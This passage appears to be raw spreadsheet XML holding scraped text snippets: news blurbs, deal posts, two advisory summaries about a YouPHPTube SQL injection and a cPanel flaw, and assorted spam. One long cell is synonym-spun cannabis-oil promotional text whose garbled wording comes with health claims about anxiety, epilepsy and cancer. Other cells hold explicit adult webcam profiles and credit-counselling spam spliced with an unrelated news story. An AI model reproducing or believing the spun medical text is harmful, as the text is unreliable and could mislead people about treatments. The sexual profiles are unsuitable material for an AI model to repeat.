large of an area the meteorologists are expecting the storm to make landfall,” Wolf said. She knew the rain would ruin their time in the sun, and the roads would be filled with evacuees heading north. Luckily for her family, she found a hotel with an available room in Orange Beach, Alabama, “so we will still get sun and water,” she said. “Plus, we will get out of there before any of the rain makes it there.” “The kids will understand one day, but last night our son didn’t eat dinner and both kids cried their little eyes out.” Hurricane Dorian dampens Labor Day travel in Florida: What you need to know The post Hurricane Dorian dampens Labor Day travel in Florida: What you need to know appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Former Harry Potter stars Emma Watson and Tom Felton are rumoured to be dating.</t>
  </si>
  <si>
    <t>Xplore Dundee are to axe the troubled 360 Circle bus route that serves key tourist destinations across the city due to low passenger numbers.</t>
  </si>
  <si>
    <t>US uber-producer snaps up the rights</t>
  </si>
  <si>
    <t>TRAVELO</t>
  </si>
  <si>
    <t>Great flight deals from Sydney or Brisbane to Johannesburg, South Africa with one of the most respected travel brands around the world, Singapore Airlines. Example travel dates are below. Let the search complete and book with your preferred OTA. Baggage Allowance 1x 30KG Checked - Economy 1x 35KG Checked - Flex and Premium Economy 1x 40KG Checked - Business 1x 50KG Checked - Suites and First Class Stop-Overs Singapore (1-2 Hours) VISA VISA Free for 90 Days Safety &amp; Insurance Here are a few tips on staying safe in South Africa and be sure to register your travel plans with SmartTraveller. If you can afford to travel, you can afford Travel Insurance. Don't skip it. 1-20/May 2020 Sydney to Johannesburg - $1,092 Brisbane to Johannesburg - $1,095 15-29/May 2020 Sydney to Johannesburg - $1,092 Brisbane to Johannesburg - $1,095 3-10/June 2020 Sydney to Johannesburg - $1,092 Brisbane to Johannesburg - $1,095 5-26/June 2020 Sydney to Johannesburg - $1,092 Brisbane to Johannesburg - $1,095 What to See &amp; Do The Culture Trip Need Car Hire? Discover Car Hire Looking for Accomodation? TRAVELO Hotels Booking.com AGODA Interstate Flights? Johannesburg to Cape Town RETURN - From $150 Johannesburg to Durban RETURN - From $130</t>
  </si>
  <si>
    <t>On 16 August 1970 The Federal Attorney General, Mr T.E.F. Hughes wielded a cricket bat to help police subdue protesters at his Sydney home.</t>
  </si>
  <si>
    <t>YouPHPTube version 7.2 suffers from a remote SQL injection vulnerability in userCreate.json.php. Published at: August 19, 2019 at 05:46PM View on Packet Storm The post YouPHPTube 7.2 SQL Injection appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Kerrie O'Brien</t>
  </si>
  <si>
    <t>Djambawa Marawili from Yilpara in East Arnhem Land has taken out the main prize in the NATSIA awards.</t>
  </si>
  <si>
    <t>Spradbery's book "WASPS – An Account of the Biology and Natural History of Social and Solitary Wasps” was considered to be the definitive text on these insects.</t>
  </si>
  <si>
    <t>The firm’s first China store comes as other foreign retailers have struggled to compete in the country. The post Costco forced to shut first China store early due to crowds appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>A Track from 90s Tahitian Band New Generation. Record Label: CHM Supersound. Like and share and don’t forget to subscribe to this channel for more. The post (French Polynesia) New Generation: Te Ta'ata Hara Nei appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>kingnunu</t>
  </si>
  <si>
    <t>DDR4 Ram 3200 using the ebay 20% off. This seems like the best deal at the moment. It's marked up a little but with the code comes down to a decent price of 124. Original Coupon Deal</t>
  </si>
  <si>
    <t>Amazing Cannabis Oil Testimonials The countless great things about Cannabis Oil as Told through customers Cannabis oil could be the topic of the very most current hype that is medicalanti-cancer treatments, anxiety and epilepsy. Despite the numerous cannabis oil testimonials available on the internet, no clinical research is available yet to guide the claims that are anti-cancer. Testimonials are mostly compiled by honest individuals who believe cannabis oil assisted them, however it is a good idea to keep some doubt through to the medical community pops up with solid evidence. Having said that, there clearly was support www.cbdoildiscount.net/ that is scientific a number of other ways that medicinal cannabis has helped individuals – means that additionally conserve everyday lives. THC (the psychoactive substance in cannabis) has revealed great vow and leads to dealing with… Anxiety Anxiety Sickness (also chemotherapy-induced sickness and cachexia) Irritation Soreness Lots of people have actually provided their stories that are amazing exactly how cannabis oil enhanced their well being. The storyline of Little Charlotte Young Charlotte Figi provides one of the more famous demonstrations of how cannabis could possibly enhance a quality that is person’s of. Charlotte experienced Dravet Syndrome, which caused her to have over 300 seizures per week. This caused her to be catatonic and delayed her speech, walking and basic development. She received typical medicines, but, like in numerous cases, they might maybe perhaps not fight her severe signs sufficient to change lives. Her moms and dads tried every thing before they finally discovered the possible anti epileptic advantageous asset of cannabis. They provided their child cannabis oil, along with her seizure frequency fallen nearly instantly. Charlotte regained some normalcy inside her life and surely could enjoy activities of a typical five-year-old again. Inside her honor, any risk of strain of cannabis she utilized had been called Charlotte’s online, and also this stress is actually used to simply help kiddies with Dravet Syndrome and epileptic seizures. Success Stories Anxiety can be a debilitating problem that ruins life and decreases the power to work in everyday circumstances. On a niche site committed in aiding people flake out and luxuriate in life more through the usage of cannabis, many customers have provided heartwarming cannabis oil testimonials about their anxiety relief: “The two years I happened to be medicated to my 1:1 Mango Haze oil, i did son’t have one(!) anxiety attack!” “…it simply relaxed me without making my head spin.” Among the reviewers additionally mentions just just how cannabis that are much him with general chronic aches: “Pain simply melts away the body aches, arthritis, and you also get up after the journey brand that is feeling.” Cannabis may have an effect that is different everyone. It doesn’t work with every person, and there are numerous potential unwanted effects. Nonetheless, these cannabis oil testimonials show that there is a complete lot of prospective good this item can perform, and several are anxiously waiting around for new research in the outcomes of cannabinoids on more diseases that are serious cancer tumors. The storyline of Stephanie LaRue Although her tale is controversial, when sharing cannabis oil testimonials, it really is well worth mentioning Stephanie LaRue. Stephanie had been clinically determined to have breast cancer whenever she was just three decades old. She chemotherapy that is underwent was additionally to locate alternate remedies. She used and discovered Rick Simpson cannabis oil. Following this, her cancer tumors went into remission, and she actually is a cancer tumors survivor for more than nine years now. There isn’t any clinical proof that cannabis/hemp/Rick Simpson oil cures cancer in humans (there is certainly some proof for mice), but Stephanie herself thinks that the oil saved her life. How do CBD and THC Help You? Testimonials reveal exactly just how many individuals have benefited from and place their hopes in cannabis oils – and CBD oil is specific, because it’s legal in every states while offering lots of advantages with few effects that are side. CBD comes from the hemp plant and soothes the senses. You can find Numerous safe CBD supplements to choose from, and you can be aided by us select the correct one. THC could possibly offer more powerful leisure but additionally is sold with legal issues, more unwanted effects and psychoactive effects that often are very unpleasant. As a whole, thousands global are utilizing both substances to fight everyday symptoms and boost their lifestyle.</t>
  </si>
  <si>
    <t>A man has been arrested and homicide squad is investigating after a stabbing killed one man and injured another.</t>
  </si>
  <si>
    <t>2020 Zero SR/F Electric Motorcycle Review: The only one left download video 2020 Zero SR/F Electric Motorcycle Review: The only one left fullhd download youtube review 2020 Zero SR/F Electric Motorcycle Review: The only... The post 2020 Zero SR/F Electric Motorcycle Review: The only one left appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Cosmetic Dentist in Vaughan, Ontario 5 5 out of 5 stars. Opens in 30 minutes Community See All 131 people like this 131 people follow this 19 check-ins About See All 1520 Steeles Ave W # 120 (1,924.45 mi) Vaughan, Ontario L4K3B9 Get Directions. Best Dentist In Vaughan Ontario Cityview Smiles Dental Centre, one of the best clinics for Vaughan dental care, houses Vaughan dentist Dr. Genna Gelfland. Dr. Gelfland specializes in comprehensive dental hygiene, focusing on preventative therapies, restorative work and gum. Top Dental Clinic In Vaughan Find the best dentist or dental clinic in Vaughan, ON offering the dental services you are Parkdale Dental Centre In Ottawa Announces a New Associate To The Team And Practice – “Our Ottawa dental services” she continued “include cosmetic dentistry: specifically teeth whitening, porcelain veneers, bonding and Invisalign. Prosthodontics include crowns and bridges, dental. See more of Woodbridge Smile Centre on Facebook Log In or Create New Account See more of Woodbridge Smile Centre on Facebook Log In Forgot account? or Create New Account Not Now Woodbridge Smile Centre Cosmetic Dentist in Vaughan, Ontario 5. . Local woman named to ‘Top Dentist’ list – “Top Dentists” is an annual survey of thousands of dental providers in the Greater Phoenix area dentists. Laskis was selected. (MENAFN – IssueWire) Get to know Dentist Dr. Michael Danial, who serves patients in Ontario and Santa Ana. treatments in the areas of general, cosmetic, and restorative dentistry. Sarnia Ontario Dentist Family Child &amp; Adult Oral Treatment Guide Launched – Sarnia Living has launched a new guide to the best 7 dentists in the local area around Sarnia Ontario, Canada. and help. Cosmetic Dentist in Vaughan, Ontario 5 5 out of 5 stars. Closes in 25 minutes Community See All 59 people like this 57 people follow this 10 check-ins About See All 7777 Weston Road Suite 218 (345.22 mi) Vaughan, Ontario L4L 0G9 Get Directions.</t>
  </si>
  <si>
    <t>Kelly Wang</t>
  </si>
  <si>
    <t>Police say the two people, a man and a woman, drove off in different cars with the same stolen licence plate.</t>
  </si>
  <si>
    <t>Supermodel Adut Akech struts her stuff for Sunday Life.</t>
  </si>
  <si>
    <t>squiddy</t>
  </si>
  <si>
    <t>Hi Bargainers, Apple Authorised Reseller, Australian stock only, Tax Invoice available. Airpods frenzy everywhere, we can do 245 on the wireless model - free express post. https://www.ifrog.com.au/epages/Ifrogs.sf/en_AU/?ObjectID=80... for the Macbook + Applecare - Total bundle comes to 4054.80 + Delivery: Macbook: https://www.ifrog.com.au/epages/Ifrogs.sf/en_AU/?ObjectPath=... (Silver Model) https://www.ifrog.com.au/epages/Ifrogs.sf/en_AU/?ObjectPath=... (Space Grey Model) AppleCare: https://www.ifrog.com.au/epages/Ifrogs.sf/en_AU/?ObjectPath=... Wired Airpods: https://www.ifrog.com.au/epages/Ifrogs.sf/en_AU/?ObjectID=80... use "AIRPODS" at checkout to receive full price of airpods removed from total order, including Macbook + Applecare. We have a great price on the MacBooks already, so if you were looking for Applecare and a new i9 Macbook Pro 15 - enjoy some free wired airpods. PS, we do have 1.5% surcharge for ZipPay/PayPal/CC/AMEX - Also important note, any CC/AMex orders, going to a residential address will have to go through a verification check, if you dont want the check and want to avoid delays, please use PayPal/EFT or ZIP. Squiddy</t>
  </si>
  <si>
    <t>Emerging talent Louis Appere believes his inclusion in the starting line-up for Saturday’s impressive opening Championship win over Inverness Caley Thistle wasn’t just a boost for him but all the kids at Tannadice.</t>
  </si>
  <si>
    <t>Horwath suggested the Hamilton unit is closing down after an "abuse of power" complaint.</t>
  </si>
  <si>
    <t>Emma Young</t>
  </si>
  <si>
    <t>Should we build new housing estates right on the beach, an hour north of Perth, and far beyond the end of the train line? Where's the line in the sand?</t>
  </si>
  <si>
    <t>Eight firms fail to implement fare-dodging rule change introduced in April 2018As many as 10,000 rail travellers have been overcharged after being caught and penalised for not having a valid ticket.The Rail Delivery Group (RDG), the industry body that represents private train operators as well as Network Rail, has admitted that tickets inspectors have overcharged fare-dodgers to the tune of tens of thousands of pounds after rail companies failed to implement a rule change introduced in April 2018. Continue reading… Read More</t>
  </si>
  <si>
    <t>It's the first time in two years a poll has found more Scots in favour of leaving the UK than staying - and it's down to Boris Johnson's Brexit strategy.</t>
  </si>
  <si>
    <t>This week, leading Counter-Strike: Global Offensive banners received DMCA withdrawals for broadcast of the Berlin 2019 Major's game. The event organizer, StarLadder, maintains that it holds the exclusive rights to the broadcast tournaments, while the broadcasters say that they have always broadcast Majors in the past. This is the first time that StarLadder has organized a CS: GO Major Contest, but these Valve sponsored biannual tournaments are the biggest competitive events of the venerable shooter. In addition to streaming programs via Twitch and the like, you can also view the action in play via the GOTV viewer, and that 's where the problem starts. Players who dreamed of returning to GOTV's Berlin Major quickly received a DCMA lift from StarLadder. Erik &amp; # 39; fl0m &amp; # 39; Flom, of Mythic, told TheScore esports that he did not receive any prior notice before the DMCA broadcast and that, unlike what had been Major's major broadcast, StarLadder later told him that he should have contacted the organizers before starting his program. broadcast.</t>
  </si>
  <si>
    <t>My Kinks: I love rough sex, spanking, being tied and dominat Webcam profile: Hi guys, my name is Lindsay, I am a Colombian girl, student and webcamer! outgoing, cheerful, uncomplicated, good friend and very accommodating! I love time alone to enjoy a good company and a lot of fun! That’s why I invite you to join my private room! you are welcome Favourite sex position: 69 What I do in my amateur show: domination excites me, dirty talk, fantasies and fetishes What I don’t like: rudeness Gallery</t>
  </si>
  <si>
    <t>Team USA’s assistant coach Steve Kerr said Saturday’s defeat to Australia would have a positive effect on the team before the World Cup begins next week.</t>
  </si>
  <si>
    <t>Regulation of the world trade in giraffe parts is a step closer.</t>
  </si>
  <si>
    <t>hotrod01</t>
  </si>
  <si>
    <t>I've been watching the Mila Square Vessel Basin Ceramic White 490mm from Astivita for a while now. It has finally come down in price. Was $105.94 previously, down to $39.00 now on sale. Use cash rewards for a further 10% off as well as free delivery on this item for $39.00 and over on Amazon.</t>
  </si>
  <si>
    <t>The parents of a 15-year-old London girl who mysteriously disappeared from a Malaysian resort a week ago said had difficulty walking.</t>
  </si>
  <si>
    <t>ASTEROID Bennu could hit Earth at 25 MILLION kph with the power of more than 76,000 Hiroshima nuclear bombs, creating a ball of fire as big as 20 kilometres wide and major tsunamis, scientists have warned. The post Bennu could hit Earth with the power of 76,000 WW2 nuclear bombs and create 20km fireball appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Gaoras</t>
  </si>
  <si>
    <t>Plenty of deals, snagged a womens activewear already. There is a Mens Fila Jacket here but hardly any sizes left https://cottonon.com/AU/fila-lcn-reversible-puffer-jacket/52... Typo has many deals for notebooks too https://cottonon.com/AU/typo/typo-shop-all/?prefn1=isSale&amp;pr... Ladies, heaps of activewear, including $15.95 Leggings https://cottonon.com/AU/sale/sale-womens/sale-womens-activew... https://cottonon.com/AU/tie-hem-7%2F8-tight/669018-01.html?d...</t>
  </si>
  <si>
    <t>Prime Minister Scott Morrison has denied Australia is a dissident at the Pacific Leaders' Forum, where climate change concerns led to a marathon meeting and a divided declaration on climate change. Island nations wanted a strong statement on climate and the phasing out of coal power, but Australia refused to unconditionally agree. Mr Morrison said his primary responsibility was to the Australian people, but his Fijian counterpart Frank Bainimarama blasted his position, tweeting "we came together in a nation that risks disappearing to the seas, but unfortunately we settled for the status quo in our communique". "Watered-down climate language has real consequences, like water-logged homes, schools, communities, and ancestral burial grounds," he tweeted. Tuvalu Prime Minister Enele Sopoaga also aired his displeasure with Australia, saying Mr Morrison went into the retreat determined to put his economy first, saying "you are concerned about saving your economy in Australia, but I am concerned about saving my people in Tuvalu". Image: @ScottMorrisonMP / Twitter</t>
  </si>
  <si>
    <t>My Kinks: zwe are a couple then we make love every day and s Webcam profile: You are in the best room on the page, so you can see everything you want, we love to please you in everything Favourite sex position: Doggy What I do in my amateur show: Money What I don’t like: People who don’t know what they want Gallery</t>
  </si>
  <si>
    <t>Four day week could tackle stress, depression and anxiety at work, campaigners say Original Source Employers across Yorkshire are being urged to switch to a four-day working week to tackle the “worrying crisis of overwork” that is making employees ill. Aiden Harper, founding member of the 4 Day Week campaign and researcher at think tank the New Economics Foundation told the Yorkshire Post that switching to working four days a week instead of five as standard would benefit workers, companies and the economy. A four-day work week would reduce stress, say campaigners The message comes as figures released today shows one in five Yorkshire workers are faking a physical illness to take time off work for their mental health over fears of being judged or sacked. Workers in the region have taken an average of four days a year off work due to stress, depression and anxiety and 64 per cent lied to their boss about the cause, the research by law firm Slater and Gordon found. Also in news: Annie is sixth generation to join Yorkshire pickle dynasty Mr Harper said the evidence from companies that have switched to four-day weeks shows everyone from individual workers to the UK economy as a whole would benefit. He said: “There’s a lot of evidence that shows that overwork is particularly bad for an individual, for their wellbeing and mental health, leading to presenteeism – people turning up to work when they’re burnt out and unable to work.” He pointed to research by government body the Health and Safety Executive which shows that by far the biggest cause of sick leave in the UK is work-related stress, anxiety and depression which has been increasing year on year. “Every other type of work-related illness has gone down over the last 30 years but in terms of mental health issues, they’ve been steadily increasing. “Worryingly, the biggest single cause of work-related stress and depression is overwork, as one in four sick days lost last year was as a result of overwork and the impact that has on stress, anxiety and depression – that’s a trend that’s been increasing over the last 10-15 years. “It’s worrying, we’d say it’s a crisis of overwork.” Also in news: Rare visitor seen on North Yorkshire Coast He said, despite the enormous number of people suffering across the region and across the UK, employers and the government tended to treat the problem as an individual issue. “We talk about self-help programmes, read books about how to sleep well, we have one-on-one management meetings. But the answer is not to individualise it, it’s to look at the structural causes,” he said. For workers, joining a trade union was one way to work towards shorter working hours, while employers should understand the “moral duty” they have to look after their employees and recognise the economic benefits of not overworking them. “Though it’s not the most important thing, obviously it makes business sense to make sure your employees are productive and can think clearly and that they don’t leave the organisation. It’s incredibly expensive to burn out your employees,” he added. Also in news: 13 people taken to hospital after being given cake spiked with cannabis at Yorkshire event National chairman Mike Cherry of the FSB, which represents small businesses, said while a four-day week may work for some small businesses, it would not work for all. “Freedom and flexibility are the watchwords here. A small consultancy working on long-term projects with fixed deadlines may find that four-day weeks are viable, and helpful. But if you’re in industries like fishing, logistics and construction where you simply have to spend extensive amounts of times in the field, it’s not a model that’s likely to fit. “Increasing productivity among the small firms that make-up 99 per cent of our business community is a must. But reducing output to four days a week is not going to solve the UK’s productivity issues. Ensuring employees are happy and motivated at work is vital, but small firms must be given the space and freedom to work out how best to achieve this in their unique environments. No two businesses are the same, so forcing a four-day week on to all of them is clearly not helpful.” A spokesman for the CBI, which also represents businesses, added: “At a time when flexible working is becoming more essential than ever, rigid approaches feel like a step in the wrong direction. Businesses are clear that politicians should work with them to avoid policies that work as a soundbite but not a solution.” The Institute of Directors’ chief economist, Tej Parikh said: “Positive steps have been made on mental health at work over recent years, but there is still room for improvement, and more and more directors are eager to lead on the issue. Flexible working practices provide just one avenue to improve staff wellbeing, employers can also look to bolster the working environment too, and further support for smaller firms to implement employee wellbeing programs in their organisations is well worth exploring.” window.fbAsyncInit = function() FB.init( appId : ‘649105445282979’, xfbml : true, version : ‘v2.9’ ); FB.AppEvents.logPageView(); ; (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_UK/sdk.js”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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Four day week could tackle stress, depression and anxiety at work, campaigners say appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Nick Kyrgios and Stefanos Tsitsipas have been stopped in their tracks by some familiar faces as Robert Farah and Juan Sebastian Cabal toppled them for the second time in as many weeks.</t>
  </si>
  <si>
    <t>Puerto Rico’s Gov. Ricardo Rossello said Friday that he was resigning as promised and swearing in veteran politician Pedro Pierluisi as his replacement, a move certain to throw the U.S. territory into a period of political chaos that could be fought out in court. CBC | World News</t>
  </si>
  <si>
    <t>Charlie Nicholas suggested that Steve Bruce made two errors regarding his Newcastle United side in the 3-1 loss against Norwich City on Saturday. The Sky Sports pundit shared that he found the Magpies’ display against Norwich alarming as they didn’t create much upfront. Nicholas suggested that Bruce picked the wrong midfield pairing by choosing Jonjo Shelvey and Ki Sung-Yeung... Source</t>
  </si>
  <si>
    <t>leyton01</t>
  </si>
  <si>
    <t>Delonghi's competitor to the Breville Barista range. Has some convenient features (integrated tamping, newb steam wand) but true coffee snobs will swear by their Breville machines. I got it so my wife doesn't have to learn to tamp/steam when the in-laws are over. Don't forget cashback and also: BONUS Barista pack worth $155RRP: https://promotions.delonghi.com.au/fathersdaycoffee19 Barista Experience - the perfect combination of technology and craft, placing you fully in control of your barista experience Sensor Grinding Technology - delivers an optimal coffee dose for a rich and flavoursome espresso - The sensor identifies the grind setting and adjusts the process to deliver the right coffee dose Smart Tamping Station - consistently tamps at the right pressure to achieve perfect results in cup - Ensures a mess-free operation, as grinding and tamping are done inside the Smart Tamping Station Active Temperature Control - maintains a precise and stable water temperature during the brewing process to guarantee a well-balanced espresso extraction Advanced Latte Milk System - easy and fast milk foam; FLAT for hot milk or FOAM for milk froth; with dedicated heating system there is no waiting time between brewing coffee and milk preparation Create any coffee recipe - Designed for versatility, features 3 pre-set recipes; you can personalise beverage length, add steamed or frothed milk, creating any coffee recipe – your choice, your taste</t>
  </si>
  <si>
    <t>ASJFTKBBSDKFZBPFLAKBFWP 428/6 IV Ausf. F DAK download video ASJFTKBBSDKFZBPFLAKBFWP 428/6 IV Ausf. F DAK fullhd download youtube review ASJFTKBBSDKFZBPFLAKBFWP 428/6 IV Ausf. F DAK down show to ASJFTKBBSDKFZBPFLAKBFWP 428/6 IV Ausf. F DAK where... The post ASJFTKBBSDKFZBPFLAKBFWP 428/6 IV Ausf. F DAK appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Oberlo</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V Nine six-figure dropshippers go head-to-head on one of the most polarizing dropshipping topics: What to sell online. Niche or general store? Sell a product over … source</t>
  </si>
  <si>
    <t>cPanel before 60.0.25 allows file-create and file-chmod operations during ModSecurity Audit logfile processing (SEC-165). Published at: August 05, 2019 at 02:15PM View on NVD website The post New vulnerability on the NVD: CVE-2016-10771 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. South Korea faces dilemma over anti-North leaflets as ties thaw Tuesday 13 August 2019 01:13 AM UTC-05 | Tags: credit-counseling http://creditcounselingconsumer.home.blog/jackson-mississippi-consumer-credit-counseling-service-888-551-1270/ SEOUL/PAJU, South Korea (Reuters) – Days after a historic inter-Korean summit Lee Min-bok, a defector who has been flying anti-Pyongyang leaflets into the North for 15 years, received a call from an official at Seoul’s Unification Ministry urging him to halt his balloon campaign. Tags: credit-counseling</t>
  </si>
  <si>
    <t>A CRASH on the M25 has sparked lane closures and commuter chaos during rush hour. Daily Express :: News Feed M25 traffic latest: Vehicle crash sparks lane closure and delays for commuters</t>
  </si>
  <si>
    <t>Yep, the seats sucked.</t>
  </si>
  <si>
    <t>Melanie Groves And Amy McCosker</t>
  </si>
  <si>
    <t>The 2019 bushfire season is looming but many landowners across Queensland are still reeling from last year's catastrophic fires, which turned more than 4 million hectares of land into ashes.</t>
  </si>
  <si>
    <t>Kong Computers</t>
  </si>
  <si>
    <t>Productivity Productivity Productivity Save $158 from the base spec NH58RA laptop with 32GB RAM and 1TB PCIe SSD. Normally $1757, now $1599! Metabox Alpha-X NH58RA High Spec OzBargain No Windows installed (Please select your prefered Operating System or bring your own) 9th Gen Intel® 6 Core™ i7-9750H (2.6GHz-4.5GHz, 12MB Cache) Intel HM370 Express Chipset NVIDIA GeForce GTX1650 4GB GDDR5 Graphics Card (Supports 3 active displays) Diamond Compound applied to processor and graphics 15.6" FHD 1920 x 1080 IPS-like Edge-to-Edge Matte 60Hz LED (144Hz, 240Hz &amp; 4K available) 32GB RAM DDR4 2666MHz, 2x16GB, 2 slots. 1TB Intel 660P Series PCIe M.2 SSD (Max 3 storage options) No Optical Drive Intel 9462 AC Dual Band WIFI/BTv5 (up to 433 Mbps) RGB colour illuminated (single zone lighting) keyboard with numeric pad Sound Blaster Cinema 5 Webcam: Built-in 2.0M FHD Video Camera 1 x USB 2.0 port, 1 x USB 3.0 (USB 3.1 Gen 1) port, 1 x USB 3.1 Gen 2 port (Type A), 1 x USB 3.1 Gen 2 (Type-C), 1 x Mini Display 1.2 port, 1 x HDMI 1.4 output port (with HDCP), 1 x 2-in-1 Audio Jack (Headphone / Microphone), 1 x Microphone jack, 1 x RJ-45 LAN port, 1 x DC-in jack 6-in-1 Card Reader (MMC, RSMMC, SD, mini SD, SDHC, SDXC) Size: 361 (W) x 258 (D) x 27.9 (H) mm Weight: 2.2Kg, Including Barebone and 48.96WH Battery Power: Removable 4 cell Smart Lithium-Ion battery pack, 48.96WH. Full Range AC-in 100~240V, 50~60Hz, 180W AC Adapter, DC output 19.5V, 9.23A 2 Year Metabox Premium Care Warranty Free Insured Startrack Express Shipping Please allow up to 7 business days to build and test at the Metabox Factory, then orders get express shipped directly to you. Ask any questions below. Thanks Kris</t>
  </si>
  <si>
    <t>The increasingly violent protests since June have emerged as Hong Kong's most serious crisis in decades and become one of the biggest challenges to Chinese leader Xi Jinping since he took power in 2012.</t>
  </si>
  <si>
    <t>Tom Zaunmayr</t>
  </si>
  <si>
    <t>The WA Nationals have called out an incident where a contractor waived his oen package into Eastern Goldfields Regional Prison</t>
  </si>
  <si>
    <t>From Bluey to The Heights and Robbie Hood, a new wave of scripted series is beginning to emerge from the fringes of Australian television and might have the best chance of ending reality TV's reign.</t>
  </si>
  <si>
    <t>M Hughes</t>
  </si>
  <si>
    <t>P7b thoroughly enjoyed their “loose parts play”. They used imagination, cooperation, negotiation, communication and many other skills to build dens in teams.</t>
  </si>
  <si>
    <t>U.S. Home | Mail Online MailOnline - get the latest breaking news, celebrity photos, viral videos, science &amp; tech news, and top stories from MailOnline and the Daily Mail newspaper. Patisserie at Prada and a Michelin star for Armarni ... how food became the latest fashion fad Sunday 18 August 2019 04:12 PM UTC-05 Food has become the perfect vehicle for designers to amplify their brand's 'personality and a dish in one of London or Paris' stores can be an affordable way to buy into a label.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190822/p11#a190822p11 Assessing the impact of telecoms’ poor privacy practices through the story of a woman stalked by a man who obtained her real-time location data from T-Mobile (Joseph Cox/VICE) Joseph Cox / VICE: Assessing the impact of telecoms’ poor privacy practices through the story of a woman stalked by a man who obtained her real-time location data from T-Mobile — Telecom giants are giving up customers’ real-time location data to stalkers and bounty hunters. Now, Motherboard speaks to a victim. Source: http://www.techmeme.com/190822/p11#a190822p11 The post Assessing the impact of telecoms’ poor privacy practices through the story of a woman stalked by a man who obtained her real-time location data from T-Mobile (Joseph Cox/VICE) appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Richard Hinds</t>
  </si>
  <si>
    <t>The disadvantage non-Victorian teams have supposedly experienced in MCG grand finals is like citing the disadvantage a young George Clooney had finding a dinner date, Richard Hinds says.</t>
  </si>
  <si>
    <t>The boom Croa centre had no hesitation asking for a snap after he attended his junior league game more than a decade ago.</t>
  </si>
  <si>
    <t>Ryanair pilots vote to strike in row over pay and conditions with union announcing plans for two 48-hour walkouts Read more? Click here</t>
  </si>
  <si>
    <t>The chicken chain’s latest offering has been selling out and earning hoards of fans. What inspired the obsession? Popeyes’ new chicken sandwich is a bona fide, boneless fried phenomenon.The fried chicken chain’s new offering has become America’s must-eat sandwich, for those who can find a location where it’s not sold out. The simple meal – battered chicken, pickles and sauce on a brioche bun – has inspired long lines nationwide and endless chatter on social media. A customer at a Popeye’s in Oakland, California, joked about the sandwich’s place in the national conversation: “It’s like Game of Thrones.” Continue reading… Read More</t>
  </si>
  <si>
    <t>There is no such thing as a “gay gene” – but there is a mix of genetic and environmental factors which influence sexual behaviour, scientists have said. Read more? Click here</t>
  </si>
  <si>
    <t>Carlton co-captain Patrick Cripps has loved his first 99 games as a Blue, but he's desperate for team success.</t>
  </si>
  <si>
    <t>I bought it just three years ago and I won’t be very pleased if Apple stop supporting itEvery week a Guardian Money reader submits a question, and it’s up to you to help him or her out – a selection of the best answers will appear in next Saturday’s paper.I’ve just discovered that my iPhone 6s, which I bought for £300 only three years ago, won’t be getting any iOS software updates after September. Is this something I should be worried about, or will it carry on working fine? I’ll be a bit pissed off if I have to buy a new one. Is there any reason why Apple can’t keep supporting its phones when they are three years old? Continue reading… Read More</t>
  </si>
  <si>
    <t>M-Sport Ford’s Teemu Suninen believes the pace notes used on Rally Germany are the most important on the calendar behind those on Rallye Monte-Carlo. Although all the stages this weekend are on mostly tarmac, the style of roads and the fact that gravel could be moved onto the stage with drivers cutting edges of corners means that co-drivers such as Jarmo Lehtinen must make sure they must use as much detail as possible to remove any possible errors. Suninen goes into the German event on the back of a tough event in his native Finland after damaging a splitter on the Ford Fiesta WRC early on and he wasn’t able to fulfil his potential for the remainder of the event. He said ahead of this weekend’s rally: “Rallye Deutschland is a really demanding rally, but I feel ready for the challenge. We had a good run last time out on Tarmac, and I hope we can build on that next week.” “The route note crews will also be really important next week – and I think this is the most important event for them after Rallye Monte-Carlo. There is always a lot of cutting here which brings a lot of dirt onto the road. The conditions can change so much from one corner to the next, and that means a lot of changes in the notes.” He continued: “We’ve had a day and a half testing to find the best set-ups on the car, and the feeling is really good. Of course it’s impossible to be on the limit all the time at an event like this, but if we stay focused I think we can have a good rally.” The last tarmac event on the calendar, the Tour de Corse, was somewhat of a turning point for Suninen’s season where he finished fifth. He then went on to achieve five more top 5 finishes in the next six events including a second-place result on Rally Italia Sardegna. Rally Germany begins tomorrow evening and continues throughout this weekend.</t>
  </si>
  <si>
    <t>Isn’t this a little late? Via Daily Mail: FBI agents were seen raiding Jeffrey Epstein’s private US Virgin Island, which has been dubbed ‘Pedophile Island’, as the sex trafficking probe around the now deceased billionaire intensifies, as exclusive DailyMailTV footage shows the search being carried out. A large group of FBI officers were seen disembarking […]</t>
  </si>
  <si>
    <t>Google outlined a plan to try and make surfing the web more private while still allowing enough targeted advertising to keep publishers - and itself - in business.</t>
  </si>
  <si>
    <t>A son remembers the day his father was shot by British troops in Derry in 1972 and hopes that at long last justice will be done.</t>
  </si>
  <si>
